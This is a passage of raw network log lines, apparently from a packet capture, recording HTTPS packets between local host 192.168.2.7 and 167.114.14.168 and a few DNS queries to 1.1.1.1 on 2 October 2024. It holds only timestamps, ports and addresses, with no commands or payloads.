                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.389951944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.389977932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390475035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390527010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390566111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390574932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390587091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390616894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.390918016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391042948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391066074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391072989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391102076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391119957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391370058 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391426086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391431093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391465902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391495943 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391509056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.391969919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.392024994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.392056942 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.392066002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.392092943 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.392107010 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.400867939 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.400937080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.400996923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.401051998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.401072025 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.401101112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.479919910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.479984999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480078936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480089903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480122089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480139971 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480236053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480287075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480304956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480314016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480340004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480359077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480492115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480540037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480570078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480576992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480602026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.480619907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481017113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481071949 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481101990 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481107950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481132030 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481149912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481471062 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481525898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481553078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481559992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481586933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.481601000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482079029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482156038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482181072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482188940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482218981 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482238054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482456923 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482501984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482530117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482537031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482564926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.482575893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.491487026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.491519928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.491554976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.491560936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.491590023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.491606951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.570422888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.570487976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.570519924 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.570530891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.570574045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.570597887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.573512077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.573558092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.573597908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.573604107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.573613882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.573642015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574116945 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574151993 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574206114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574212074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574237108 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574239969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574265003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574295044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574295044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574307919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574331045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574354887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574583054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574598074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574654102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574661970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574672937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.574734926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575251102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575265884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575306892 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575314999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575344086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575364113 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575783014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575800896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575833082 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575839996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575866938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.575884104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.579111099 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.581724882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.581743956 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.581860065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.581866980 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.581911087 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.674030066 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.674050093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.674170971 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.674202919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.674251080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.677613974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.677627087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.677687883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.677700043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.677742004 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678287029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678307056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678370953 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678385973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678421021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678744078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678761959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678900003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678906918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.678942919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679270029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679282904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679339886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679347038 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679390907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679968119 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.679982901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680032969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680041075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680092096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680362940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680381060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680437088 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680444002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.680481911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.686444998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.686458111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.686527014 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.686538935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.686578035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.764725924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.764748096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.764945984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.764980078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.765027046 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768141031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768157005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768222094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768237114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768275976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768704891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768721104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768778086 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768785000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.768817902 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769257069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769270897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769325972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769331932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769366026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769738913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769753933 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769803047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769814014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.769846916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770303011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770320892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770371914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770380020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770416021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770821095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770833969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770883083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770889044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770914078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.770931959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.777040005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.777054071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.777116060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.777127028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.777164936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.855539083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.855571032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.855679989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.855703115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.855746031 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.858968973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859000921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859046936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859059095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859086037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859105110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859571934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859594107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859647989 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859654903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.859689951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860013008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860033989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860074043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860080004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860104084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860121012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860614061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860639095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860676050 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860682011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860711098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.860723019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861119986 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861140013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861172915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861177921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861202002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861224890 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861751080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861771107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861824036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861830950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.861860991 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.867631912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.867656946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.867702961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.867713928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.867754936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.937407017 CEST5500653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.942173958 CEST53550061.1.1.1192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.944977999 CEST5500653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.945900917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.945930958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.945991993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.946024895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.946041107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.948909044 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:48.949456930 CEST44349713167.114.14.168192.168.2.7
